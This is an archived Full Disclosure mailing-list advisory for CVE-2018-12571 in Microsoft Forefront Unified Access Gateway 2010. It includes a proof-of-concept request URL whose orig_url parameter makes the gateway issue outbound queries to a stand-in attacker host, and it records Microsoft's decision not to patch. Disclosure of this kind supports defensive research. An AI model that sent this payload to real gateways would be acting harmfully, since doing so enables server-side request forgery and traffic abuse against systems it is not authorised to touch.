| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 25 Jun 2018 11:26:08 +0300 From: okan coskun <okancoskun2@...il.com> To: fulldisclosure@...lists.org Subject: Re: [FD] Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction # Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction # Vendor Homepage: https://www.microsoft.com/ # Version: 2010 # CVE : CVE-2018-12571 # MSRC: Case 39000 # Proof of Concept #1 Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to trigger outbound DNS queries for arbitrary hosts via a comma-separated list of URLs in the orig_url parameter, possibly causing a traffic amplification and/or SSRF outcome. /uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/Intern alSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp& resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype= 0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae% 2D41ae%2D89f1%2D1eb6eff34091&orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM <http://2fattacker.site.com/>%2Ftest # Fixes It will not be patched by Microsoft. Reason: We have completed our investigation and determined that the case doesn't meet the bar for servicing in a security update _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists